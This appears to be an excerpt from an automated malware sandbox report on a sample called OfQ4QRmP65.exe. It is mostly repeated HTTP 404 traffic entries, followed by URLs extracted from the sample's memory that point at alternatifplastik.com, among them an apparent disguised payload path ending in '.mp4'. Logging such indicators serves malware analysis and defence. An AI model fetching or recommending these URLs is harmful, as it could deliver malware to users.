Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:48:22 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:48:24 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:48:27 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:48:30 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:48:32 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:48:35 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:48:38 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:48:41 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:48:44 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:48:47 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:48:50 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:48:52 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:48:55 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:48:58 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:49:01 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:49:03 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:49:06 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:49:09 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:49:11 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:49:14 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:49:17 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:49:20 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:49:22 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:49:25 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:49:28 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:49:31 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:49:34 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:49:37 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:49:39 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:49:42 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:49:45 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:49:48 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:49:51 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:49:54 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:49:57 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:50:00 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:50:03 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:50:06 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:50:09 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:50:12 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:50:15 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:50:18 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:50:21 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:50:23 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:50:26 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:50:29 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:50:32 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:50:35 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:50:37 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:50:40 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:50:43 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:50:46 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:50:49 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:50:52 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:50:54 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:50:57 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:51:00 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: OfQ4QRmP65.exe, 00000000.00000002.2960108048.00000000025AF000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.000000000298B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://alternatifplastik.com
Source: OfQ4QRmP65.exe, 00000000.00000002.2960108048.00000000025AF000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.000000000298B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://alternatifplastik.comd
Source: OfQ4QRmP65.exe, 00000000.00000002.2960108048.000000000259B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: OfQ4QRmP65.exe, 00000000.00000002.2960108048.00000000025AF000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.000000000298B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.alternatifplastik.com
Source: OfQ4QRmP65.exe, 00000000.00000002.2960108048.00000000025AF000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.000000000298B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.alternatifplastik.comd
Source: OfQ4QRmP65.exe, 00000000.00000002.2960108048.000000000259B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.alternatifplastik.com
Source: OfQ4QRmP65.exe, 00000000.00000002.2960108048.0000000002556000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.00000000029DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.alternatifplastik.com/dixa/Dquqrwa
Source: OfQ4QRmP65.exe, 00000000.00000002.2960108048.0000000002556000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.000000000253A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.alternatifplastik.com/dixa/Dquqrwaot.mp4
